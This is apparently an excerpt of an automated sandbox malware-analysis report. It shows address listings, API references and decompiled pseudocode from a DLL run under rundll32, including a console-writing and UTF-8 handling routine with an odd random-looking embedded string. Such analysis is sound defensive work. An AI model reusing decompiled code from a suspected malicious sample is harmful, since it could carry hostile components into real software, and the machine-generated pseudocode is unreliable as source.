                                                                                                                                                                                      				}
                                                                                                                                                                                      			}




















                                                                                                                                                                                      0x6e9dc344
                                                                                                                                                                                      0x6e9dc34b
                                                                                                                                                                                      0x6e9dc355
                                                                                                                                                                                      0x6e9dc35d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc369
                                                                                                                                                                                      0x6e9dc377
                                                                                                                                                                                      0x6e9dc37a
                                                                                                                                                                                      0x6e9dc37e
                                                                                                                                                                                      0x6e9dc387
                                                                                                                                                                                      0x6e9dc38e
                                                                                                                                                                                      0x6e9dc391
                                                                                                                                                                                      0x6e9dc394
                                                                                                                                                                                      0x6e9dc394
                                                                                                                                                                                      0x6e9dc370
                                                                                                                                                                                      0x6e9dc373
                                                                                                                                                                                      0x6e9dc39b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc3a1
                                                                                                                                                                                      0x6e9dc3a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc3af
                                                                                                                                                                                      0x6e9dc3c7
                                                                                                                                                                                      0x6e9dc3ca
                                                                                                                                                                                      0x6e9dc3ce
                                                                                                                                                                                      0x6e9dc3d7
                                                                                                                                                                                      0x6e9dc3de
                                                                                                                                                                                      0x6e9dc3e1
                                                                                                                                                                                      0x6e9dc3e4
                                                                                                                                                                                      0x6e9dc3e4
                                                                                                                                                                                      0x6e9dc3c0
                                                                                                                                                                                      0x6e9dc3c3
                                                                                                                                                                                      0x6e9dc3eb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc3f1
                                                                                                                                                                                      0x6e9dc3f9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc3fb
                                                                                                                                                                                      0x6e9dc407
                                                                                                                                                                                      0x6e9dc40a
                                                                                                                                                                                      0x6e9dc40e
                                                                                                                                                                                      0x6e9dc417
                                                                                                                                                                                      0x6e9dc41e
                                                                                                                                                                                      0x6e9dc421
                                                                                                                                                                                      0x6e9dc424
                                                                                                                                                                                      0x6e9dc424
                                                                                                                                                                                      0x6e9dc400
                                                                                                                                                                                      0x6e9dc403
                                                                                                                                                                                      0x6e9dc42b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc42d
                                                                                                                                                                                      0x6e9dc435
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc437
                                                                                                                                                                                      0x6e9dc447
                                                                                                                                                                                      0x6e9dc44a
                                                                                                                                                                                      0x6e9dc44e
                                                                                                                                                                                      0x6e9dc457
                                                                                                                                                                                      0x6e9dc45e
                                                                                                                                                                                      0x6e9dc461
                                                                                                                                                                                      0x6e9dc464
                                                                                                                                                                                      0x6e9dc464
                                                                                                                                                                                      0x6e9dc440
                                                                                                                                                                                      0x6e9dc443
                                                                                                                                                                                      0x6e9dc46b
                                                                                                                                                                                      0x6e9dc479
                                                                                                                                                                                      0x6e9dc484
                                                                                                                                                                                      0x6e9dc48b
                                                                                                                                                                                      0x6e9dc48f
                                                                                                                                                                                      0x6e9dc498
                                                                                                                                                                                      0x6e9dc49f
                                                                                                                                                                                      0x6e9dc4a2
                                                                                                                                                                                      0x6e9dc4a2
                                                                                                                                                                                      0x6e9dc481
                                                                                                                                                                                      0x6e9dc481
                                                                                                                                                                                      0x6e9dc484
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc46d
                                                                                                                                                                                      0x6e9dc46d
                                                                                                                                                                                      0x6e9dc46d
                                                                                                                                                                                      0x6e9dc476
                                                                                                                                                                                      0x6e9dc476

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC37A
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC387
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC3CA
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC3D7
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC40A
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC417
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC44A
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC457
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC48B
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC498
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                      • Opcode ID: ed068c759289e73b8e45b766af98ef6906951867c61e35210c187d3a01ae68e1
                                                                                                                                                                                      • Instruction ID: 6be7469f04033a563f406cba0ecdea17030a0a68f134b4f894864231c5b6def4
                                                                                                                                                                                      • Opcode Fuzzy Hash: ed068c759289e73b8e45b766af98ef6906951867c61e35210c187d3a01ae68e1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F419271184A69AFDB526FE4AD10BFA3718EF13781F04C020FE145E251E7B1DA19AF92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                                                      			E6E9E1BF0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				void* _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				char _v60;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				long _t57;
                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                      				long _t60;
                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                      				long _t81;
                                                                                                                                                                                      				signed int _t86;
                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                      				signed int _t88;
                                                                                                                                                                                      				signed int _t91;
                                                                                                                                                                                      				char _t93;
                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                      				void* _t97;
                                                                                                                                                                                      				signed int _t100;
                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                      				struct _OVERLAPPED* _t102;
                                                                                                                                                                                      				signed int _t105;
                                                                                                                                                                                      				signed int* _t106;
                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                      				signed char _t112;
                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                      				long _t118;
                                                                                                                                                                                      				void** _t119;
                                                                                                                                                                                      				void* _t120;
                                                                                                                                                                                      				long _t122;
                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                      				void* _t133;
                                                                                                                                                                                      				struct _OVERLAPPED** _t135;
                                                                                                                                                                                      				void* _t144;
                                                                                                                                                                                      				long _t152;
                                                                                                                                                                                      				signed char* _t155;
                                                                                                                                                                                      				DWORD* _t156;
                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                      				void** _t158;
                                                                                                                                                                                      				void** _t160;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(__ebp);
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_t158 = _t157 - 0x30;
                                                                                                                                                                                      				_t152 = _a4;
                                                                                                                                                                                      				_t135 = __ecx;
                                                                                                                                                                                      				if(_t152 == 0) {
                                                                                                                                                                                      					 *(__ecx + 4) = 0;
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t96 = __edx;
                                                                                                                                                                                      					_t58 = GetStdHandle(0xfffffff4);
                                                                                                                                                                                      					if(_t58 == 0) {
                                                                                                                                                                                      						_t57 = 6;
                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t133 = _t58;
                                                                                                                                                                                      						if(_t58 != 0xffffffff) {
                                                                                                                                                                                      							_v48 = 0;
                                                                                                                                                                                      							_t60 = GetConsoleMode(_t133,  &_v48);
                                                                                                                                                                                      							__eflags = _t60;
                                                                                                                                                                                      							if(_t60 == 0) {
                                                                                                                                                                                      								__eflags = _t133;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									goto L42;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_v48 = 0;
                                                                                                                                                                                      									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
                                                                                                                                                                                      									__eflags = _t81;
                                                                                                                                                                                      									if(_t81 == 0) {
                                                                                                                                                                                      										_t57 = GetLastError();
                                                                                                                                                                                      										_t102 = 0;
                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                      										_t122 = 1;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t102 = _v48;
                                                                                                                                                                                      										_t57 = 0;
                                                                                                                                                                                      										_t122 = 0;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *_t135 = _t122;
                                                                                                                                                                                      									_t135[1] = _t102;
                                                                                                                                                                                      									_t135[2] = _t57;
                                                                                                                                                                                      									goto L9;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t57 = _a8[4] & 0x000000ff;
                                                                                                                                                                                      								__eflags = _t57;
                                                                                                                                                                                      								if(_t57 == 0) {
                                                                                                                                                                                      									__eflags = _t152 - 0x1000;
                                                                                                                                                                                      									_t84 =  <  ? _t152 : 0x1000;
                                                                                                                                                                                      									_push( <  ? _t152 : 0x1000);
                                                                                                                                                                                      									E6E9D3650( &_v60, _t96);
                                                                                                                                                                                      									_t158 =  &(_t158[1]);
                                                                                                                                                                                      									__eflags = _v60 - 1;
                                                                                                                                                                                      									if(_v60 != 1) {
                                                                                                                                                                                      										_t86 = _v56;
                                                                                                                                                                                      										_t97 = _v52;
                                                                                                                                                                                      										goto L28;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										__eflags = _v56;
                                                                                                                                                                                      										if(_v56 == 0) {
                                                                                                                                                                                      											_t87 =  *_t96 & 0x000000ff;
                                                                                                                                                                                      											_t38 = _t87 + 0x6ea1f570; // 0x1010101
                                                                                                                                                                                      											_t105 =  *_t38 & 0x000000ff;
                                                                                                                                                                                      											__eflags = _t105 - 2;
                                                                                                                                                                                      											if(_t105 < 2) {
                                                                                                                                                                                      												L39:
                                                                                                                                                                                      												_t135[2] = 0x6ea208cc;
                                                                                                                                                                                      												_t135[1] = 0x1502;
                                                                                                                                                                                      												goto L40;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags = _t105 - _t152;
                                                                                                                                                                                      												if(_t105 <= _t152) {
                                                                                                                                                                                      													goto L39;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t106 = _a8;
                                                                                                                                                                                      													 *_t106 = _t87;
                                                                                                                                                                                      													_t106[1] = 1;
                                                                                                                                                                                      													goto L38;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t88 = _v56;
                                                                                                                                                                                      											__eflags = _t88 - _t152;
                                                                                                                                                                                      											if(__eflags > 0) {
                                                                                                                                                                                      												_t100 = _t88;
                                                                                                                                                                                      												_t118 = _t152;
                                                                                                                                                                                      												_push(0x6ea20904);
                                                                                                                                                                                      												goto L45;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t125 = _t96;
                                                                                                                                                                                      												_push(_t88);
                                                                                                                                                                                      												E6E9D3650( &_v48, _t125);
                                                                                                                                                                                      												_t158 =  &(_t158[1]);
                                                                                                                                                                                      												_t86 = E6E9E2730(_t96,  &_v48, _t133, _t135);
                                                                                                                                                                                      												_t97 = _t125;
                                                                                                                                                                                      												L28:
                                                                                                                                                                                      												_push(_t97);
                                                                                                                                                                                      												_push(_t86);
                                                                                                                                                                                      												_t57 = E6E9E2470(_t97, _t135, _t133, _t133, _t135);
                                                                                                                                                                                      												_t158 =  &(_t158[2]);
                                                                                                                                                                                      												goto L9;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eflags = _t57 - 4;
                                                                                                                                                                                      									if(_t57 >= 4) {
                                                                                                                                                                                      										E6E9F99A0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx", 0x3a, 0x6ea2086c);
                                                                                                                                                                                      										_t158 =  &(_t158[1]);
                                                                                                                                                                                      										asm("ud2");
                                                                                                                                                                                      										L42:
                                                                                                                                                                                      										_t61 = E6E9F94E0(_t96,  &M6EA1FBBA, 0x23, _t133, _t135, __eflags, 0x6ea1fc64);
                                                                                                                                                                                      										_t158 =  &(_t158[1]);
                                                                                                                                                                                      										asm("ud2");
                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t110 =  *_t96;
                                                                                                                                                                                      										_t155 = _a8;
                                                                                                                                                                                      										__eflags = (_t110 & 0x000000c0) - 0x80;
                                                                                                                                                                                      										if((_t110 & 0x000000c0) != 0x80) {
                                                                                                                                                                                      											_a4 = 0;
                                                                                                                                                                                      											goto L24;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t155[_t57] = _t110;
                                                                                                                                                                                      											_t112 = _a4 + 1;
                                                                                                                                                                                      											_a4 = _t112;
                                                                                                                                                                                      											_t57 =  *_t155 & 0x000000ff;
                                                                                                                                                                                      											_t96 =  *(_t57 + 0x6ea1f570) & 0x000000ff;
                                                                                                                                                                                      											__eflags = _t96 - _t112;
                                                                                                                                                                                      											_v24 = _t96;
                                                                                                                                                                                      											if(_t96 <= _t112) {
                                                                                                                                                                                      												_t61 = _t112 & 0x000000ff;
                                                                                                                                                                                      												__eflags = _t112 - 5;
                                                                                                                                                                                      												if(__eflags >= 0) {
                                                                                                                                                                                      													L43:
                                                                                                                                                                                      													_t100 = _t61;
                                                                                                                                                                                      													_t118 = 4;
                                                                                                                                                                                      													_push(0x6ea208d4);
                                                                                                                                                                                      													L45:
                                                                                                                                                                                      													E6E9F9470(_t96, _t100, _t118, _t133, _t135, __eflags);
                                                                                                                                                                                      													_t160 =  &(_t158[1]);
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      													goto L46;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_push(_t61);
                                                                                                                                                                                      													_t57 = E6E9D3650( &_v60, _t155);
                                                                                                                                                                                      													_t158 =  &(_t158[1]);
                                                                                                                                                                                      													__eflags = _v60 - 1;
                                                                                                                                                                                      													_a4 = 0;
                                                                                                                                                                                      													if(_v60 == 1) {
                                                                                                                                                                                      														L24:
                                                                                                                                                                                      														_t135[2] = 0x6ea208cc;
                                                                                                                                                                                      														_t135[1] = 0x1502;
                                                                                                                                                                                      														goto L8;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t114 = _v52;
                                                                                                                                                                                      														_t91 = _v56;
                                                                                                                                                                                      														__eflags = _t114 - _t96;
                                                                                                                                                                                      														 *_t158 = _t114;
                                                                                                                                                                                      														if(_t114 != _t96) {
                                                                                                                                                                                      															L46:
                                                                                                                                                                                      															_t101 =  &_v24;
                                                                                                                                                                                      															_t119 = _t160;
                                                                                                                                                                                      															_v48 = 0;
                                                                                                                                                                                      															_push(0x6ea208e4);
                                                                                                                                                                                      															_push( &_v48);
                                                                                                                                                                                      															goto L48;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															_t156 =  &_v48;
                                                                                                                                                                                      															_push(_t96);
                                                                                                                                                                                      															_push(_t91);
                                                                                                                                                                                      															E6E9E2470(_t96, _t156, _t133, _t133, _t135);
                                                                                                                                                                                      															_t160 =  &(_t158[2]);
                                                                                                                                                                                      															__eflags = _v48 - 1;
                                                                                                                                                                                      															if(_v48 != 1) {
                                                                                                                                                                                      																_t93 = _v44;
                                                                                                                                                                                      																 *_t160 = _t96;
                                                                                                                                                                                      																__eflags = _t93 - _t96;
                                                                                                                                                                                      																_v20 = _t93;
                                                                                                                                                                                      																if(_t93 != _t96) {
                                                                                                                                                                                      																	_t101 =  &_v20;
                                                                                                                                                                                      																	_t119 = _t160;
                                                                                                                                                                                      																	_v48 = 0;
                                                                                                                                                                                      																	_push(0x6ea208f4);
                                                                                                                                                                                      																	_push(_t156);
                                                                                                                                                                                      																	L48:
                                                                                                                                                                                      																	E6E9F9AB0(_t96, _t101, _t119, _t133);
                                                                                                                                                                                      																	asm("ud2");
                                                                                                                                                                                      																	L50();
                                                                                                                                                                                      																	_t120 = _t135;
                                                                                                                                                                                      																	__eflags = _t101 - 0x46a;
                                                                                                                                                                                      																	if(_t101 > 0x46a) {
                                                                                                                                                                                      																		__eflags = _t101 - 0x271c;
                                                                                                                                                                                      																		if(_t101 <= 0x271c) {
                                                                                                                                                                                      																			__eflags = _t101 - 0x1715;
                                                                                                                                                                                      																			if(_t101 > 0x1715) {
                                                                                                                                                                                      																				__eflags = _t101 - 0x1f4d;
                                                                                                                                                                                      																				if(_t101 > 0x1f4d) {
                                                                                                                                                                                      																					__eflags = _t101 - 0x1f4e;
                                                                                                                                                                                      																					if(_t101 == 0x1f4e) {
                                                                                                                                                                                      																						goto L93;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0x2022;
                                                                                                                                                                                      																						if(_t101 == 0x2022) {
                                                                                                                                                                                      																							goto L93;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x25e9;
                                                                                                                                                                                      																							if(_t101 != 0x25e9) {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								goto L93;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					__eflags = _t101 - 0x1716;
                                                                                                                                                                                      																					if(_t101 == 0x1716) {
                                                                                                                                                                                      																						goto L93;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0x1b64;
                                                                                                                                                                                      																						if(_t101 == 0x1b64) {
                                                                                                                                                                                      																							goto L93;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x1b80;
                                                                                                                                                                                      																							if(_t101 == 0x1b80) {
                                                                                                                                                                                      																								goto L93;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			} else {
                                                                                                                                                                                      																				__eflags = _t101 - 0x4cf;
                                                                                                                                                                                      																				if(_t101 > 0x4cf) {
                                                                                                                                                                                      																					__eflags = _t101 - 0x4d0;
                                                                                                                                                                                      																					if(_t101 == 0x4d0) {
                                                                                                                                                                                      																						return 4;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0x50f;
                                                                                                                                                                                      																						if(_t101 == 0x50f) {
                                                                                                                                                                                      																							return 0x1a;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x5b4;
                                                                                                                                                                                      																							if(_t101 == 0x5b4) {
                                                                                                                                                                                      																								goto L93;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					__eflags = _t101 - 0x46b;
                                                                                                                                                                                      																					if(_t101 == 0x46b) {
                                                                                                                                                                                      																						return 0x1e;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0x476;
                                                                                                                                                                                      																						if(_t101 == 0x476) {
                                                                                                                                                                                      																							return 0x20;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x4cf;
                                                                                                                                                                                      																							if(_t101 != 0x4cf) {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								return 5;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																		} else {
                                                                                                                                                                                      																			_t144 = _t101 - 0x271d;
                                                                                                                                                                                      																			__eflags = _t144 - 0x34;
                                                                                                                                                                                      																			if(_t144 <= 0x34) {
                                                                                                                                                                                      																				goto __edx;
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																			__eflags = _t101 - 0x3c2a - 2;
                                                                                                                                                                                      																			if(_t101 - 0x3c2a < 2) {
                                                                                                                                                                                      																				goto L93;
                                                                                                                                                                                      																			} else {
                                                                                                                                                                                      																				__eflags = _t101 - 0x35ed;
                                                                                                                                                                                      																				if(_t101 == 0x35ed) {
                                                                                                                                                                                      																					goto L93;
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					goto L106;
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																		}
                                                                                                                                                                                      																	} else {
                                                                                                                                                                                      																		__eflags = _t101 - 0xb6;
                                                                                                                                                                                      																		if(_t101 > 0xb6) {
                                                                                                                                                                                      																			__eflags = _t101 - 0x10a;
                                                                                                                                                                                      																			if(_t101 <= 0x10a) {
                                                                                                                                                                                      																				__eflags = _t101 - 0xde;
                                                                                                                                                                                      																				if(_t101 <= 0xde) {
                                                                                                                                                                                      																					__eflags = _t101 - 0xb7;
                                                                                                                                                                                      																					if(_t101 == 0xb7) {
                                                                                                                                                                                      																						return 0xc;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0xce;
                                                                                                                                                                                      																						if(_t101 != 0xce) {
                                                                                                                                                                                      																							goto L106;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							return 0x21;
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					__eflags = _t101 - 0xdf;
                                                                                                                                                                                      																					if(_t101 == 0xdf) {
                                                                                                                                                                                      																						return 0x1b;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0xe8;
                                                                                                                                                                                      																						if(_t101 == 0xe8) {
                                                                                                                                                                                      																							return 0xb;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x102;
                                                                                                                                                                                      																							if(_t101 == 0x102) {
                                                                                                                                                                                      																								goto L93;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			} else {
                                                                                                                                                                                      																				__eflags = _t101 - 0x3e2;
                                                                                                                                                                                      																				if(_t101 > 0x3e2) {
                                                                                                                                                                                      																					__eflags = _t101 - 0x3e3;
                                                                                                                                                                                      																					if(_t101 == 0x3e3) {
                                                                                                                                                                                      																						goto L93;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0x41d;
                                                                                                                                                                                      																						if(_t101 == 0x41d) {
                                                                                                                                                                                      																							goto L93;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x461;
                                                                                                                                                                                      																							if(_t101 == 0x461) {
                                                                                                                                                                                      																								goto L93;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					__eflags = _t101 - 0x10b;
                                                                                                                                                                                      																					if(_t101 == 0x10b) {
                                                                                                                                                                                      																						return 0xe;
                                                                                                                                                                                      																					} else {
                                                                                                                                                                                      																						__eflags = _t101 - 0x150;
                                                                                                                                                                                      																						if(_t101 == 0x150) {
                                                                                                                                                                                      																							return 0xf;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							__eflags = _t101 - 0x252;
                                                                                                                                                                                      																							if(_t101 == 0x252) {
                                                                                                                                                                                      																								L93:
                                                                                                                                                                                      																								return 0x16;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								goto L106;
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																		} else {
                                                                                                                                                                                      																			_t101 = _t101 + 0xfffffffe;
                                                                                                                                                                                      																			__eflags = _t101 - 0xa8;
                                                                                                                                                                                      																			if(_t101 <= 0xa8) {
                                                                                                                                                                                      																				_t120 = _t120 +  *((intOrPtr*)(0x6e9e20f8 + _t101 * 4));
                                                                                                                                                                                      																				goto __edx;
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																			L106:
                                                                                                                                                                                      																			return 0x28;
                                                                                                                                                                                      																		}
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	L38:
                                                                                                                                                                                      																	_t57 = 0;
                                                                                                                                                                                      																	_t135[1] = 1;
                                                                                                                                                                                      																	 *_t135 = 0;
                                                                                                                                                                                      																	goto L9;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																asm("movsd xmm0, [esp+0x14]");
                                                                                                                                                                                      																asm("movsd [esi+0x4], xmm0");
                                                                                                                                                                                      																L40:
                                                                                                                                                                                      																_t57 = 1;
                                                                                                                                                                                      																 *_t135 = 1;
                                                                                                                                                                                      																goto L9;
                                                                                                                                                                                      															}
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t135[1] = 1;
                                                                                                                                                                                      												L5:
                                                                                                                                                                                      												 *_t135 = 0;
                                                                                                                                                                                      												goto L9;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t57 = GetLastError();
                                                                                                                                                                                      							L7:
                                                                                                                                                                                      							_t135[1] = 0;
                                                                                                                                                                                      							_t135[2] = _t57;
                                                                                                                                                                                      							L8:
                                                                                                                                                                                      							 *_t135 = 1;
                                                                                                                                                                                      							L9:
                                                                                                                                                                                      							return _t57;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}













































                                                                                                                                                                                      0x6e9e1bf0
                                                                                                                                                                                      0x6e9e1bf1
                                                                                                                                                                                      0x6e9e1bf2
                                                                                                                                                                                      0x6e9e1bf4
                                                                                                                                                                                      0x6e9e1bf7
                                                                                                                                                                                      0x6e9e1bfb
                                                                                                                                                                                      0x6e9e1bff
                                                                                                                                                                                      0x6e9e1c1e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1c01
                                                                                                                                                                                      0x6e9e1c01
                                                                                                                                                                                      0x6e9e1c05
                                                                                                                                                                                      0x6e9e1c0d
                                                                                                                                                                                      0x6e9e1c2d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1c0f
                                                                                                                                                                                      0x6e9e1c0f
                                                                                                                                                                                      0x6e9e1c14
                                                                                                                                                                                      0x6e9e1c4e
                                                                                                                                                                                      0x6e9e1c58
                                                                                                                                                                                      0x6e9e1c5e
                                                                                                                                                                                      0x6e9e1c60
                                                                                                                                                                                      0x6e9e1cb9
                                                                                                                                                                                      0x6e9e1cbb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1cc1
                                                                                                                                                                                      0x6e9e1cc1
                                                                                                                                                                                      0x6e9e1cd3
                                                                                                                                                                                      0x6e9e1cd9
                                                                                                                                                                                      0x6e9e1cdb
                                                                                                                                                                                      0x6e9e1d55
                                                                                                                                                                                      0x6e9e1d5b
                                                                                                                                                                                      0x6e9e1d5b
                                                                                                                                                                                      0x6e9e1d5d
                                                                                                                                                                                      0x6e9e1cdd
                                                                                                                                                                                      0x6e9e1cdd
                                                                                                                                                                                      0x6e9e1ce1
                                                                                                                                                                                      0x6e9e1ce3
